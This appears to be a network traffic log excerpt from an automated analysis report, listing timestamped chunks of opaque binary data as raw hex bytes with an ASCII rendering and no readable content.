                                                                                                                                                                                      2021-10-30 11:52:19 UTC686INData Raw: 7c d0 38 e3 05 f3 af e8 bd fa 64 3e 0d 74 bf 72 3d dd f9 17 35 db 87 0f 04 b7 bb cf 49 a4 df 3b 6d f3 b5 10 86 25 b5 7f ae 51 66 ea 81 87 96 dc 76 be e1 32 b7 52 cc 73 ad a9 1b 9f ff e2 ef fe b1 d8 f1 bc 61 35 a7 3d fc fa b2 51 70 71 87 28 b3 4a 07 85 8c ed 2f 2b f7 8e 29 57 39 7b 65 bc 32 62 ca 5c 60 f5 43 c4 21 9a d5 5f a4 e3 12 b3 97 65 c6 4b 23 b7 9f dc 0d c4 c5 6c 08 9b 95 47 5b f1 f8 f9 12 0f 0b 7f 72 59 2a 9b d3 da 2f 7d 58 13 98 dd 27 b5 18 21 3e 34 fc 04 69 dd 39 4b 8b e1 05 66 2c bb d5 da 0e 2a a6 c9 a1 d6 ca 3a cf 62 c6 db cf ee 3b 67 59 12 79 a9 81 14 07 46 0e 61 da dd 83 17 15 99 7b 30 a9 ec bc 0e c0 ac 2b ce 5c 39 23 f5 a5 8e e9 9e 92 cf f3 de 89 c3 3b fc 5e 5f a6 83 ec 66 0e 74 cb 99 93 d3 81 4e 11 72 6f d4 3b 78 ae 51 78 d1 1e f2 38 cf 73
                                                                                                                                                                                      Data Ascii: |8d>tr=5I;m%Qfv2Rsa5=Qpq(J/+)W9{e2b\`C!_eK#lG[rY*/}X'!>4i9Kf,*:b;gYyFa{0+\9#;^_ftNro;xQx8s
                                                                                                                                                                                      2021-10-30 11:52:19 UTC687INData Raw: f4 91 17 c2 6b ce 71 3e 27 ce 3a 60 34 58 d7 c5 ac c9 a2 c4 35 7f 82 e2 f9 a0 73 07 73 2e 89 a7 f4 c5 bc 71 3f 7f e2 1e bc b4 1b f8 e0 41 6d e0 d6 e3 4b 7d a7 79 eb 4b ac d0 07 7f d4 19 b4 d7 7c eb 67 fd d6 e3 d0 1e eb 2c ff 83 f3 5b 5f aa 47 51 61 e6 d8 26 39 7d 60 d0 67 1e 10 af d3 2d 07 f8 50 5f c1 7e 30 21 76 ac fc 47 5d f0 72 9b 7f fc f7 d4 32 54 24 6c 12 e3 ac 29 93 dc 36 7c be 16 6f 7b 9f 35 44 d7 b9 90 de 7a 60 2b 04 67 9a ac a4 cd bb 6c e8 33 1f 64 ae 93 16 da dc 73 72 9a 98 46 68 e7 45 e9 9f fb 77 fe e4 f3 41 2d 20 a9 6f 48 b0 4b 8b 29 a3 a9 fb 10 42 4c 5e f1 9c 25 a4 09 2d 48 f2 8c ed a9 72 d3 87 a9 15 26 0f e4 7a 36 62 3a 06 87 27 8d 76 ae 6b fb 51 1f 7a 22 f6 03 15 13 92 3f 7a 87 ff 8c 85 d5 21 7f e5 28 4e df 39 19 d5 1c b0 6e 2a 3b d6 cd 81
                                                                                                                                                                                      Data Ascii: kq>':`4X5ss.q?AmK}yK|g,[_GQa&9}`g-P_~0!vG]r2T$l)6|o{5Dz`+gl3dsrFhEwA- oHK)BL^%-Hr&z6b:'vkQz"?z!(N9n*;
                                                                                                                                                                                      2021-10-30 11:52:19 UTC689INData Raw: e7 d8 87 b5 90 3a b0 f6 49 a6 09 4a 69 91 d4 f1 f8 b1 03 d3 39 b6 32 ca 13 19 da b4 8a 2f 2d a6 19 13 d3 54 be 49 66 c0 37 eb 1c 0c 26 e6 87 60 e4 a4 10 58 b1 08 ec dc d4 49 4b 03 8a 07 99 7a f5 a0 ae 48 fa a5 48 4e af 7c 20 df 7b 44 d0 f2 ac 8f e8 c6 cc 0d b0 f7 d0 56 df c0 e1 2a ef 58 e3 a1 39 90 f1 c4 3e 0f dd 29 ce 9c 44 e9 41 66 5d 71 63 7b 82 b4 e8 1f 7b 5a 71 d6 6f c8 6f 95 cc ee cc 3d af c3 44 85 aa ee 99 7c 2b a7 56 35 0d 71 cc 1f 5f a3 8f e2 cf 7e c2 3c 8f b7 9c 07 c6 17 d5 3d af 3f 3b 13 4f ed bd cf 87 eb 07 1e 0f 1b 46 3e e7 3f 1e ce 80 90 5a ad c4 61 56 82 d1 da 47 7b aa fa 61 84 e1 bc ea 2b 20 84 b4 d7 0b 61 a4 e1 8b 5b ee d6 1b 12 57 0f 4a 9d 7c fb ad 0a f3 cf fd 5c f2 a6 f6 bc 2e 5f aa 0f 5e ee 5d ef 9e 16 68 de f9 fe 45 d2 8c 01 41 26 2f
                                                                                                                                                                                      Data Ascii: :IJi92/-TIf7&`XIKzHHN| {DV*X9>)DAf]qc{{Zqoo=D|+V5q_~<=?;OF>?ZaVG{a+ a[WJ|\._^]hEA&/
                                                                                                                                                                                      2021-10-30 11:52:19 UTC690INData Raw: d8 3f 35 3b 93 db ce eb bd 1f 08 47 af 85 d3 07 8e ba 1f fc ad 3f f0 f8 cf 73 d0 d6 4d bd 6f f8 77 3f 10 24 39 ab ca ef db e9 c7 0f 23 61 6f f1 8b 2f de e4 2d 4f fe 19 13 91 ad 70 eb 19 08 e4 7e 80 e7 de 9a 88 03 47 7d ce 1f e5 3c fa 3a 68 7e ea 98 d7 be 6c 13 19 ca ec f6 ad d0 74 37 f8 4e 91 3a fc 04 fd 21 26 dd bd a4 37 17 2b 3f 92 67 1e a6 e5 03 67 0e ac 16 d9 fa 25 0f d8 39 b2 8f 7d bc 58 22 9c e9 57 0e 89 3b 39 a7 76 60 7f cd 0e 25 7c 0a 85 99 0f 33 c3 4f 3e 66 07 67 ce 55 03 42 e8 ab d4 f1 3c 97 9e db 9e fa 42 88 a7 3e fd 7d 8e b9 f2 f3 e6 b3 6a 6c 81 55 6e 9c 5a fb e3 cc 82 3c 6a 2f da 47 fe cf 26 f7 8b f5 e3 4b 60 c7 cf 2f 64 5b 8b 19 db 35 4f 7f 5d db 41 3f ca ab d8 c8 3f 9c 46 24 3f 7b 35 76 af a3 c7 a1 7d d4 07 d7 e9 b1 03 5f bb a5 97 73 64 3f
                                                                                                                                                                                      Data Ascii: ?5;G?sMow?$9#ao/-Op~G}<:h~lt7N:!&7+?gg%9}X"W;9v`%|3O>fgUB<B>}jlUnZ<j/G&K`/d[5O]A??F$?{5v}_sd?
                                                                                                                                                                                      2021-10-30 11:52:19 UTC691INData Raw: 58 f7 38 72 cf d7 30 c2 eb 41 7f c5 43 67 7c 42 b9 fb b5 51 5e c3 0e cd 08 cc 7d af 73 68 fe e1 83 0e f9 b0 65 26 4f 13 b3 fd 1d 28 31 68 f2 19 07 ee 7e bb 62 e7 75 4b e8 1c 66 ac 26 da 4e 0d 32 d2 ca b1 a9 eb 5e eb 25 fa 3d 92 da f3 61 ad 7d 72 1d e2 17 a0 e6 f3 f7 fd 96 ef af df a8 d5 1c 82 3c f8 c1 74 c8 cb 40 20 63 e2 b6 24 fb a6 93 de 8a 51 87 ed dc ec f7 ea 8f c5 b3 57 73 78 77 1f c6 91 9e a9 6d bf 14 c9 ef eb 35 35 1f 3a 66 1d e4 b4 c3 e7 2c d3 9a 8e f4 62 9a 75 8a a0 66 ed 37 ad 9d d4 88 ac 07 e5 24 2f e7 d4 ce 9c f4 01 97 14 32 a7 f8 d5 3a 9e 82 15 f9 e7 7a b6 46 f3 c8 b3 23 e3 ba 98 56 4e b2 16 ad 79 4d 51 6b ef 16 b8 f1 8f 1f d8 8e 73 81 35 49 7f e6 24 a9 5c 5b e0 d4 64 e7 6c 84 b3 fc c0 3c f7 04 a5 a1 8b ce b9 bd 91 b6 32 5e fb 0e cc 9c 47 7a
                                                                                                                                                                                      Data Ascii: X8r0ACg|BQ^}she&O(1h~buKf&N2^%=a}r<t@ c$QWsxwm55:f,buf7$/2:zF#VNyMQks5I$\[dl<2^Gz
                                                                                                                                                                                      2021-10-30 11:52:19 UTC693INData Raw: 39 1f d6 2e f8 68 d1 b5 a4 9c 5b 3a b5 eb f6 86 68 3a bf da ae b8 2d 70 94 28 25 c4 53 2f ff b2 06 a5 8b 7e e2 96 67 57 e6 16 3b b4 89 0a dd ea 70 2e 43 9f 29 e7 43 8b fd ba 3c 15 36 39 d2 1b 11 58 31 f9 2d 99 95 b0 df 33 c4 b1 97 eb 1f 2f 53 3a f4 97 73 98 78 fc a5 fc 95 62 a7 b4 e9 27 af e0 e2 a2 f2 57 ca 98 d3 6c ff c2 81 a0 f2 b6 26 4c 2d 79 d8 19 3f 78 b9 47 6c ee 95 58 9b f7 43 65 62 f8 7a cd fc 80 36 38 7a cf f7 d8 64 8f b5 0e 7c fe 03 bf f9 8f 1d ff 1d b5 98 45 ca a7 9d 39 9e 9a 97 57 37 53 fa c5 35 65 0e b0 d6 0c 3e 22 a3 07 a6 11 5b 3c 8d 48 d6 50 a9 98 e6 15 93 59 bc 7a d4 04 cc ba 00 f3 9a 54 68 ec 89 cc 4e f5 2c bf 71 7b 10 92 22 92 bc 6b 27 d7 4c 6b 0d 28 1a 24 73 d2 a4 6f c5 bd 86 cf 29 b3 8c 20 53 39 d7 af 39 26 87 88 ec 7a dd 2f d8 d2 db
                                                                                                                                                                                      Data Ascii: 9.h[:h:-p(%S/~gW;p.C)C<69X1-3/S:sxb'Wl&L-y?xGlXCebz68zd|E9W7S5e>"[<HPYzThN,q{"k'Lk($so) S99&z/
                                                                                                                                                                                      2021-10-30 11:52:19 UTC694INData Raw: 7d d9 91 83 39 63 54 db 29 2c 29 9c 95 2f b3 70 b8 c4 a9 3d fd a1 98 ca b4 fe c5 bd 7d 80 0f af e9 81 2f f7 5c bb 25 d4 5f 77 b6 47 cc b6 31 15 d4 c0 3f 6f 93 8d ca 9e 29 21 3e fb 1a 95 37 0a 82 be e6 8f c0 75 17 a3 df 5b 8f a7 1e 45 d7 66 37 7c 75 e2 33 f5 5a 7a 11 4b 7a 5f eb 35 72 3e 30 bc f5 5a ae 1c ce 17 9d 78 06 75 1d b7 14 08 e1 d4 ca 1f 81 47 dd 84 82 67 99 bf fa 05 d2 f3 01 c2 78 bd 06 c0 70 3e d4 db ef 76 3b a7 f6 43 f3 7c 98 69 7f ec 7c 3e 6c 64 82 a5 74 85 22 01 bf 63 d7 1b b7 eb 08 f7 e5 1c bc 42 4c 1b 89 e9 5b 6a 1e cc b6 b0 7a d6 b4 53 e0 4c 7f e6 ad 58 f3 f5 1b 35 4c 51 54 a7 16 fa 3a cd 82 0a 38 bb f6 04 1e d6 3e 7f ef 6f fa 23 f5 77 d4 12 e5 59 af 59 87 38 66 1a f1 19 9b ed 32 c7 a6 72 6a f6 24 25 10 05 c9 f7 43 d1 85 37 0d 53 c4 6c ee
                                                                                                                                                                                      Data Ascii: }9cT),)/p=}/\%_wG1?o)!>7u[Ef7|u3ZzKz_5r>0ZxuGgxp>v;C|i|>ldt"cBL[jzSLX5LQT:8>o#wYY8f2rj$%C7Sl
                                                                                                                                                                                      2021-10-30 11:52:19 UTC695INData Raw: 44 ef 73 18 db 88 8d 5c e5 65 64 a3 f3 ce 3d 59 d1 41 af e7 27 a6 4e 1e 13 2c 7a b4 3f d7 68 8e 05 8b 4f a0 c6 9f 5d a0 6b 6d 53 41 5e 92 9c 1d da 88 66 a3 df 44 a6 ab 76 ec 13 cc 4e 6a 4f 3c 9b 9e b9 f2 e7 dc d0 f9 6c f5 cc 49 4c 3d cb a4 79 9e 09 81 c3 7d c7 bc f9 de c0 f0 c8 c9 c6 47 d9 d9 e5 4b eb f3 9f b9 67 12 1a 8c de a2 67 57 f9 7b cb 4f 6d 86 93 9f fb 99 d7 eb fa 2e 5c 6b 20 27 84 43 03 b2 92 36 26 f5 ea 44 79 f6 67 7d 16 06 20 0f 57 58 6b 85 33 fc 15 02 76 38 78 0a 5e 79 71 ce c4 b9 e6 79 1d e6 be c5 44 ac 2e 64 e5 8c 3d ce c9 78 d3 01 d6 c7 1e ab 8f 49 9e d3 ac 4d fe ec a7 a2 3e d5 6a 62 33 7d 79 f9 c0 91 0f 48 4f db 1c 8e 2c 26 d8 24 73 4f f1 13 0e 7d df 57 f2 3d 77 bb ce d9 02 e6 5c 47 b1 b9 a6 f2 a9 e8 88 29 73 e9 55 4d a1 e8 f1 db 2e e7 65
                                                                                                                                                                                      Data Ascii: Ds\ed=YA'N,z?hO]kmSA^fDvNjO<lIL=y}GKggW{Om.\k 'C6&Dyg} WXk3v8x^yqyD.d=xIM>jb3}yHO,&$sO}W=w\G)sUM.e
                                                                                                                                                                                      2021-10-30 11:52:19 UTC697INData Raw: 6e 51 d0 97 4c ea e4 a2 65 81 5a 2d 88 78 29 83 09 f4 5d 5c b1 c3 c7 f9 15 c7 38 7c 61 ec 00 b4 03 1f 83 65 fd 85 3b 0c f1 ca eb 35 0b 8b 23 fd e7 45 2b 70 4b 3d 09 33 3f 78 7a 5f bb 7d 20 73 f3 7d 80 77 07 e8 7c 5f 00 d9 1b 4b 92 d3 c6 4f 06 32 c3 66 f6 c8 56 d5 72 d4 9c e5 c2 70 7c 5e 7c c0 c1 4f 38 e2 fe ad 5a c5 ad 83 00 34 10 e9 d1 e6 9e 68 f1 13 e4 f6 a0 06 80 8d 52 ce 5c c3 3e d6 e9 87 45 46 cb ea 48 3f 06 72 c1 d3 8e 18 08 6d a0 57 1f 3c 83 49 58 d7 3c 75 f4 73 d0 16 6b d8 67 50 bc 1e c4 62 e4 43 da b7 62 9e 7e de 01 c0 dd 98 a8 ff d3 c1 af f8 55 bf 73 fc e3 91 13 e7 8c 0b 3a 2c 67 1e b2 0c c9 5c d1 37 4e d7 c3 0e ad 2c 0f 59 6a c5 55 47 b8 07 91 61 c4 2d 66 4d ea 8b db 54 87 32 26 89 a9 eb 88 09 5e fc d0 4f 71 f3 1b 18 aa 14 11 f0 ac 23 1f e7 de
                                                                                                                                                                                      Data Ascii: nQLeZ-x)]\8|ae;5#E+pK=3?xz_} s}w|_KO2fVrp|^|O8Z4hR\>EFH?rmW<IX<uskgPbCb~Us:,g\7N,YjUGa-fMT2&^Oq#
                                                                                                                                                                                      2021-10-30 11:52:19 UTC698INData Raw: 6d 72 aa 5a b8 b5 46 62 68 b5 46 58 30 fa 2b 4e f3 00 e5 ac e5 0c 37 f7 d1 bd 90 32 7b b7 ce 4c 6b 48 ea 38 1c 87 0b 74 87 36 eb 6f c8 17 3f ad a0 be a8 e0 5a 31 d6 03 1b 63 4a 60 ce e2 02 f3 60 07 07 4a 1f 1a 40 6e 41 c6 f3 0c 04 50 f7 8e 88 e9 48 af f2 61 72 c5 e2 3a 36 74 21 08 c6 22 19 b6 fb f8 5a 2c 2d c6 e8 d4 ec 1d 2e 55 1f fc 94 2f 9e ba 8f 03 b1 47 1e 98 f0 da e5 4d 47 7b af 53 a8 42 76 72 af d9 b0 08 91 65 c4 b8 0e 00 32 dd 85 e7 4d df 9b 2e 9f 9e 6e 32 d3 07 c4 87 e6 f6 7b 95 81 ec 8d 0a 1e b9 26 5d 7b e2 cb 92 64 34 e0 bd d1 5a 84 d2 fc 63 e8 32 68 97 c5 cb 4a 07 f0 0a a0 57 2b a3 b3 17 cb 19 16 52 66 d0 62 7f f4 06 56 5d 60 e4 d4 17 44 19 ec 47 7c ee a2 50 e1 7c af c8 87 97 a7 a1 c8 84 57 1b 1b e3 0e 22 6d 48 e2 e3 5a 9c 31 9f 86 b8 e8 c3 6a
                                                                                                                                                                                      Data Ascii: mrZFbhFX0+N72{LkH8t6o?Z1cJ``J@nAPHar:6t!"Z,-.U/GMG{SBvre2M.n2{&]{d4Zc2hJW+RfbV]`DG|P|W"mHZ1j
                                                                                                                                                                                      2021-10-30 11:52:19 UTC699INData Raw: bc a8 15 d0 e8 b0 02 ac 2a 78 f3 64 3d ec fe 6d 0d 02 32 f6 9d 43 5d c5 ac b3 23 03 a4 24 8a 34 73 05 4e 6b a7 fc ea e4 42 ce 9e 64 64 b5 27 d9 e5 d7 04 03 52 57 84 80 e6 d4 55 fb e0 e1 40 91 4d 9d 55 f4 e1 d0 82 82 a5 13 68 1d 93 bc 55 5f bc 51 af 55 10 bc 62 7a b9 b4 f7 ec 03 db fb 6b 9f 61 72 31 29 f2 a9 63 2e ce 88 b8 1c 6b 02 f9 e8 49 9b 7e 15 54 a4 93 66 97 a3 1e 20 b7 90 3b 44 9a 59 b7 04 ea bd da c8 f0 3c 6f 8d bc a1 e6 fb 97 dd 58 80 bc 44 76 e4 07 4c ec b6 4c d5 a3 76 ae d5 37 7f 4e d4 09 37 e1 87 39 7a d6 cd 86 56 1f 6c c5 69 58 08 da 7d b2 19 27 03 dc fb 74 1d 6b aa 89 ea 1e 7b 0d 52 37 9c 1c 2f 1a 2c 90 16 e8 ee 1b e8 8d 22 fc f0 4b 0c 3e 74 fc b8 41 f5 89 26 e4 c8 e3 cf c9 65 d9 12 3f 14 e1 5b a7 13 47 f4 39 f7 a3 6b dc b6 2e 6a 5d 17 59 b7
                                                                                                                                                                                      Data Ascii: *xd=m2C]#$4sNkBdd'RWU@MUhU_QUbzkar1)c.kI~Tf ;DY<oXDvLLv7N79zVliX}'tk{R7/,"K>tA&e?[G9k.j]Y
                                                                                                                                                                                      2021-10-30 11:52:19 UTC700INData Raw: 22 12 03 ea e5 87 82 00 df 6b 71 cc 35 de c0 12 a5 1b be 12 a3 9e 0f 1c b4 ef 03 48 0b 34 9f cd 93 b7 c5 6b 4f d8 72 f5 8a 51 62 4e ff 9d 34 d9 fc e3 cd 7c 50 fb 99 93 a7 6f 9b 35 7c af 71 78 99 c0 3c 8f 39 80 e6 ce 46 2d 38 5c 34 21 d7 e0 43 5a da 80 7c b0 b1 26 ad f6 93 23 7d 5a e6 46 ed af aa ff 85 94 9a 5d 91 bb ac 2d 2a 57 6b c2 53 53 b9 bb 8f 4e 2c 66 1c 7e 43 d2 92 0f dd 03 02 6d fa b0 99 67 0b d8 10 e4 15 42 dd b6 3a 64 a9 28 f0 b0 28 00 2b dd 35 e5 4d 2e 63 bf ad b4 ee 53 96 c3 b1 e2 2a 00 17 d3 54 3a 6d 60 68 3d 03 dd 87 7b 66 df 1c ad 29 73 be c2 c1 78 c8 ce 08 a0 0a 60 ef 41 66 44 53 1b 6b 3c 70 bc 1f 12 cc 8d 3a 6e 11 1e b9 bb 0f 2b 23 2b 20 d7 76 98 c4 e1 16 66 49 9e 6e be 8f 8f d3 e7 b2 d8 01 d6 9d 0f 1c e7 a8 f3 76 5f b6 e1 e7 c1 5f 88 f9
                                                                                                                                                                                      Data Ascii: "kq5H4kOrQbN4|Po5|qx<9F-8\4!CZ|&#}ZF]-*WkSSN,f~CmgB:d((+5M.cS*T:m`h={f)sx`AfDSk<p:n+#+ vfInv__
                                                                                                                                                                                      2021-10-30 11:52:19 UTC702INData Raw: 1c 98 92 f7 f5 19 bc d6 50 5f be 4f 62 e0 66 fd 9d fc e2 40 14 ba b2 08 ad 15 3f 68 06 ee b5 d9 55 44 50 db 02 ba b0 0f f5 fe 32 80 c5 97 d5 fc 72 60 5d 70 62 b4 ad f6 0e 65 0a 2c 28 ad 7b 64 4e 02 db 9d 16 cd 58 93 23 a6 fc e3 9d 7e 4d 11 51 02 ca 72 10 0e b1 c0 86 cc 16 fb b0 bb 30 1f 20 f4 de 04 d7 35 ac de ae ca 1e 27 fa 35 50 0f f8 f9 be a7 86 9c 18 fc 4f 30 b0 42 be 1e d6 f0 83 1e f0 73 7d f8 f8 7c 38 60 20 9b e7 e2 a1 f7 83 ad 39 ae d1 b4 08 34 27 93 66 de ba 40 9b ce 07 40 ca 7a a8 1a 43 d7 54 fb af 73 8f 49 fa c8 79 8c e8 15 87 ae 4b 20 f6 25 4d 6b d0 6a c3 8e 59 1b 96 29 b4 78 0f eb da e0 f3 b3 1f d4 64 7f c6 0f 67 f8 3b 6b e0 fc 0d 5b 3e b0 c5 c0 df 07 83 55 2f 5f a3 b4 80 84 5a 2f ad 3e 3b b1 2e 35 70 ed 85 b9 8e 25 47 91 72 58 0c 97 3c 6b 51
                                                                                                                                                                                      Data Ascii: P_Obf@?hUDP2r`]pbe,({dNX#~MQr0 5'5PO0Bs}|8` 94'f@@zCTsIyK %MkjY)xdg;k[>U/_Z/>;.5p%GrX<kQ
                                                                                                                                                                                      2021-10-30 11:52:19 UTC703INData Raw: a2 39 ae 55 b8 68 01 d0 b0 b7 07 7e c8 dd 3f 97 18 7d f0 62 d1 c2 1f 3a 2b b2 ef ec 17 9f 04 dd 00 65 f9 a0 16 5a e5 60 a8 a8 96 03 c2 95 1f ed a7 de eb 19 de cf 04 6a 51 a5 1e 6a 54 eb 70 56 0d 67 bc f9 38 e0 bb 17 8c ca 48 b4 4f 7c a8 f3 8b 47 7e f3 18 cc 85 c6 0a 16 97 c6 29 3d 2c e9 75 02 c9 5a 19 98 62 97 07 95 93 fb e0 f5 8d 1f 5d 5f e9 d2 56 59 40 0d 75 be 38 db f0 75 48 af 29 4c 15 8a 60 1d f0 5c 93 1c e6 84 9b e4 1f 45 20 07 f9 b4 90 60 47 e1 bc ee 9a f5 05 80 64 59 25 83 d3 8f 89 3b 57 61 0c aa ec 5d 37 da 98 78 2d c2 e3 da 31 41 af eb 62 cb 07 b4 48 86 ad 87 35 e7 11 ee 8d 85 ac 54 cf cc 83 15 94 a1 bd e5 8d 12 2d da 66 b7 44 f6 ac fd c9 2d 9b 38 fd b3 0f d0 b5 da 1f 7c 76 9d c5 51 98 bb e0 f5 1b 56 30 1f 31 dd d8 7b ac 07 35 8c c8 cb eb c5 eb
                                                                                                                                                                                      Data Ascii: 9Uh~?}b:+eZ`jQjTpVg8HO|G~)=,uZb]_VY@u8uH)L`\E `GdY%;Wa]7x-1AbH5T-fD-8|vQV01{5
                                                                                                                                                                                      2021-10-30 11:52:19 UTC704INData Raw: 30 aa 8d 1e 5c db eb 62 9d 7c 58 d3 9a 8c 30 a6 33 d2 fb 89 6b 67 1f c9 cc 49 8b 1a 1e 1c 08 c8 07 94 8f 2b 84 3d 85 8f 3d 95 45 cf ec 2b cb 0a 1d e4 8a 69 e8 4b 7e 8f dc 48 ae bd de 13 f6 79 5e 10 00 db d9 37 d7 2f 20 1f 66 72 97 67 9a ae 67 ee 2f 2d 46 24 c6 c1 b4 28 5a 0f 15 b6 aa 94 d3 b5 d3 32 1a 8e aa b1 36 6d 0c bd 56 d0 fa dc ce f3 cd 1c d9 cd 79 2d 22 07 53 ef 59 9f 63 3e 3c 85 93 9c 3a ac f3 92 f3 3d 65 3f 87 74 3d 80 d5 43 9a fd cd 65 71 66 f4 63 3f e0 1c e0 d8 57 9c 45 3e b4 e1 c4 f4 19 4d 4e 87 eb 63 f0 c4 0d 30 96 c4 4f 9e f3 7c 70 aa 87 35 8f fa 6d 1a 78 7c 0e 3a 36 ff 08 54 43 bd d4 b7 fd ee fd ce e5 e7 f5 87 3f 5f 3b ee 1b 1a 99 20 79 2a ed 7d fe 57 7f d9 6f e7 3f 68 af 92 8a e6 85 11 d1 87 6b 0c e6 b4 a5 e1 1c 48 1d 98 1c 98 b9 c9 87 e5
                                                                                                                                                                                      Data Ascii: 0\b|X03kgI+==E+iK~Hy^7/ frgg/-F$(Z26mVy-"SYc><:=e?t=Ceqfc?WE>MNc0O|p5mx|:6TC?_; y*}Wo?hkH
                                                                                                                                                                                      2021-10-30 11:52:19 UTC706INData Raw: 75 10 7d 5a 1d 31 21 8f 73 60 6a 48 24 69 0d c5 64 b6 ea 3f ce 83 c3 3a 32 78 b0 a2 2f dc 15 a9 2b 37 81 5e a9 a1 67 5a 33 87 a2 56 47 4c f5 92 f1 45 14 b5 05 5c 9b 7b d5 07 2b 86 1f d2 4a 8b 4f 94 d6 81 65 21 26 21 97 25 90 d1 28 be 72 9a a3 17 38 ab 92 73 9d b4 f1 43 1d 0a 44 99 44 9e 89 ce 95 34 20 c2 d4 d9 0b 7d 68 3d f0 63 cd a9 44 f5 0c 82 ab 97 16 1f 06 c4 f8 61 50 4a 58 74 09 b0 9f 7a f1 ba 81 e3 c7 3d 6d 9e d6 09 e9 27 b0 66 7e f0 b8 ee b0 35 94 99 87 8a 0c 51 e4 d1 55 9c 8b c4 e4 fd 89 4b e6 5e c3 f2 06 17 44 ff 24 8c 2f e6 d0 e2 b5 9f 0f 44 88 33 5b 87 0a 12 12 6a bd ba a1 87 8d fb 0a 76 c4 f3 80 00 dd 69 1a 31 a1 af d6 d0 3a 54 a0 c3 77 6c 0e ed 2b f6 18 96 3d c6 68 e0 c6 6c 3a 00 49 5b d1 75 d2 f5 d6 8d 98 b1 8a 0b f9 f7 f0 b2 fb 5e 43 38 b5
                                                                                                                                                                                      Data Ascii: u}Z1!s`jH$id?:2x/+7^gZ3VGLE\{+JOe!&!%(r8sCDD4 }h=cDaPJXtz=m'f~5QUK^D$/D3[jvi1:Twl+=hl:I[u^C8
                                                                                                                                                                                      2021-10-30 11:52:19 UTC707INData Raw: d6 3c 1b e5 78 a8 0e bc 2d a0 39 ad f7 f5 dc 9e 91 81 a8 66 0f 0f f2 ee 4b 3f a6 e4 52 9d 9c fc 02 6d 7d bc 17 62 c2 fb 38 3f 83 7a 5d 10 93 8f 41 94 31 01 98 f7 04 57 d7 31 ae 63 ec 9d 31 0d 00 d7 4f 0d b0 8e 6c 36 ac 9c 20 e8 a0 1e cd 31 99 11 28 e3 f0 39 4c ab 81 b8 38 f3 bd 8e b4 e4 98 e4 70 bd 18 b8 de ba 77 c8 f6 6f d2 5a 67 5e 8c 65 97 1e ef 93 68 0b bf df 33 b6 b1 5e e5 54 9e 38 fe 08 14 bb 42 4e e6 2a 27 02 23 86 3d 23 5e 16 c1 38 c4 01 e4 99 21 df a8 6b 41 ee fb 19 ad de 03 18 df 0e 8d 9f cd e0 7c d0 8a f1 d3 f9 b0 15 09 fc 17 0d a8 e9 21 2b ff 0d 51 c4 c1 f9 bf a0 42 ae f3 df 2c fa ce ff bf a8 de 87 7c 75 b8 0f 58 1f 02 63 03 c3 01 fd fc cb 7f f5 ef 3c a4 06 df 38 3c e2 07 6f 4c bc 49 3d 9a 67 dc f9 ac 4b cc 7e ca 11 75 1e 4d eb 56 dd 0b 71 7f
                                                                                                                                                                                      Data Ascii: <x-9fK?Rm}b8?z]A1W1c1Ol6 1(9L8pwoZg^eh3^T8BN*'#=#^8!kA|!+QB,|uXc<8<oLI=gK~uMVq
                                                                                                                                                                                      2021-10-30 11:52:19 UTC708INData Raw: e8 17 7d fa ef ff 27 7f fb d3 7f fe 9f fe 4f 18 07 64 ec 04 a4 b7 0f 9a fb 22 dc 2f 2d fa fe 9d bf ff d7 3f fd be 3f f8 bb a1 fe d7 1e ff c7 ff ed ff e1 d3 ff fa 7f f1 bf d2 4b 36 2e 5b be 88 b8 6a 29 f3 fa e1 c7 02 23 3c 4a e0 f4 5f fc 2f ff a7 9f fe ce 4f fc 0d 4a d9 b7 3f 86 e1 e2 dd ea 3a a8 e8 07 c6 9b 08 5e a7 f1 5a 91 68 8a 1e f9 41 c4 9b df 36 46 6a 13 ec 10 47 3d f8 97 fd f4 e9 8f fe c8 f7 7f fa 7f fd 3f fe 9f 9f fe ef ff d7 ff 9b 73 1b cc 4b 4e 62 3f 26 b0 b9 0a d7 c5 ac 43 5e 25 58 a1 b1 38 78 af c9 c6 07 52 c0 55 13 af 1b 6c 6c 0a 0f 67 f0 f3 5f b1 97 af cc 5f fc af ff ab 9f 7e f4 ef ff 2d d6 7c 0d 7e ea 27 ff c9 a7 ff d9 df fb 07 b1 52 5e 47 e9 36 85 ef ff ab 7f f6 d3 2f fd f5 bf c6 de 97 f1 7f fe df fc ef 3e fd 5f fe f7 ff 27 72 f6 cd 11 13
                                                                                                                                                                                      Data Ascii: }'Od"/-??K6.[j)#<J_/OJ?:^ZhA6FjG=?sKNb?&C^%X8xRUllg__~-|~'R^G6/>_'r
                                                                                                                                                                                      2021-10-30 11:52:19 UTC710INData Raw: fa c1 ad fb e0 61 ec a7 bf 8d 87 35 3d b0 e9 c1 2d 39 62 c8 c9 de fa 27 e0 ea 1b e7 c3 9b 2b 6c ec 57 0f 62 c3 c6 d5 e4 80 1f 39 c9 f3 55 cf 57 1e 0f 67 ba f2 78 15 ea 5d 10 af 47 0e bd 6e d2 fd 43 1f 3f 06 2e 6f ec 25 0e 5e 66 0c 4d 80 b2 32 7f 0e bc 17 f2 75 7f 1b 13 d8 75 f7 ed 1c dd d7 f1 1e c3 17 7d 3e b8 8c e1 f7 6d 3e 94 e5 83 59 c5 92 73 f8 41 61 69 1a ec ed fe 7a 00 7a 8e 68 c7 fd d4 43 98 87 f6 88 07 86 a7 5e 3e 7a dc f8 f0 d5 67 c7 4e ff 7b e2 46 91 ba 86 5e 71 3d ac e4 35 94 e5 1d 82 af 5d da 8c 81 d0 31 32 de a3 fe 88 1c ef 47 bc 3f e3 fe f6 6d bc 67 f9 5e ed 31 1f dc be 1b 23 48 f4 da 0f 48 3a 87 7e 00 ab 07 33 9f 8b fe c1 2b e3 c1 a3 86 23 fc 7c 10 bb 8d b9 86 de f5 5b c3 39 9d b1 3c 57 dd 6f db e7 20 c0 65 61 18 4a 1e 43 9f 3f 5d 1b fe 03
                                                                                                                                                                                      Data Ascii: a5=-9b'+lWb9UWgx]GnC?.o%^fM2uu}>m>YsAaizzhC^>zgN{F^q=5]12G?mg^1#HH:~3+#|[9<Wo eaJC?]
